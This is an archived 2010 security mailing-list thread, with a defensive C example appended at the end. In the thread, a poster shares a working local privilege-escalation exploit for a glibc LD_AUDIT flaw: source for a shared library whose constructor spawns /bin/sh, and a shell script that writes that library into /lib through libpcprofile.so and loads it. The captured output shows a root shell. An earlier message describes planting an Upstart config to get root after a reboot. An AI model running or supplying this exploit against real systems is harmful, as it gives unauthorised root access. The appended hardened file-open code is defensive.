One would hope a system didn't allow just anyone to write to /lib/
On Tue, Nov 9, 2010 at 4:43 AM, Xavier Garcia <[email protected]> wrote:
> Hi guys,
>
>
> I finally found an easier way to gain root privileges, without
> rebooting the computer.
>
>
> The vulnerability can be used to upload a custom library to the
> server and then execute a root shell.
>
> The library is really simple (libevil.so)
>
> ----
>
> #include <errno.h>
> #include <unistd.h>
>
> static void
> __attribute__ ((constructor))
> install (void)
> {
> execl("/bin/sh", "/bin/sh", (char *) 0);
> }
>
> ----
>
> u...@host:~/$ cat ./run.sh
>
> umask 0
> gcc -c -fPIC evil.c -o evil.o
> gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
> LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping
> cat ./libevil.so > /lib/libevil.so
> LD_AUDIT="libevil.so" ping
>
>
> u...@host:~/$ sh run.sh
> ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
> Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
> [-p pattern] [-s packetsize] [-t ttl] [-I interface]
> [-M pmtudisc-hint] [-m mark] [-S sndbuf]
> [-T tstamp-options] [-Q tos] [hop1 ...] destination
> # whoami
> root
> #
>
>
> I hope it is helpful.
>
> Regards,
>
> Xavier Garcia
>
>
>
>
> On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:
> > Hi guys,
> >
> > I am trying to find some ways to gain root access by using the
> > vulnerability described in the advisory
> >
> > http://marc.info/?l=full-disclosure&m=128776663124692&w=2
> >
> > published by Tavis Ormandy.
> >
> > The advisory states that Cron can be used to escalate privileges,
> > but Cron does not accept files that are writable by the group or
> > others, returning the error BAD FILE MODE.
> >
> > I have been looking for alternative ways to gain root access, but
> > there are not many places where it is possible.
> >
> > I have found that Upstart (http://en.wikipedia.org/wiki/Upstart)
> > does not check the permissions and happily reads the
> > configuration files every time it restarts. This means that we can
> > create a configuration file that will instruct Upstart to
> > drop a root shell :)
> >
> >
> > The down side is that we have to be patient and wait until the
> > computer is rebooted, or use some social engineering.
> >
> >
> > You can find more details at
> >
> >
> > http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html
> >
> >
> > I hope this finding is interesting or useful for the list.
> >
> > Regards,
> >
> > Xavier Garcia
> >
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
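
The thread contrasts cron, which rejects files writable by group or others, with Upstart, which reads its configuration without checking permissions. Below is that check written as a hardened file open for a privileged process; it is an added example, not code from the thread, cron or Upstart, and `open_trusted` is a hypothetical name.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper, not cron's or Upstart's code: open a file that a
 * privileged process is about to trust. Refuse it unless it is a regular
 * file owned by `owner` and not writable by group or others.
 * Returns a read-only descriptor, or -1 with errno set. */
int open_trusted(const char *path, uid_t owner)
{
    struct stat st;
    int err;
    /* O_NOFOLLOW refuses a symlink planted as the final path component;
     * O_NONBLOCK keeps a FIFO at that path from hanging the caller. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0)
        return -1;
    /* Check the opened object, not the path, so a rename between check
     * and use cannot swap in a different file. */
    if (fstat(fd, &st) != 0)
        err = errno;
    else if (!S_ISREG(st.st_mode))
        err = EINVAL;
    else if (st.st_uid != owner)
        err = EPERM;
    else if (st.st_mode & (S_IWGRP | S_IWOTH))
        err = EACCES;   /* the condition the post says cron rejects */
    else
        return fd;
    close(fd);
    errno = err;
    return -1;
}

/* Usage: ./a.out FILE...  Reports which files a root service could trust. */
int main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        int fd = open_trusted(argv[i], 0);
        printf("%s: %s\n", argv[i], fd >= 0 ? "ok" : strerror(errno));
        if (fd >= 0)
            close(fd);
    }
    return 0;
}
```

The check covers the file itself only; every directory on the path needs the same ownership and mode guarantees, since a writable directory lets the file be replaced.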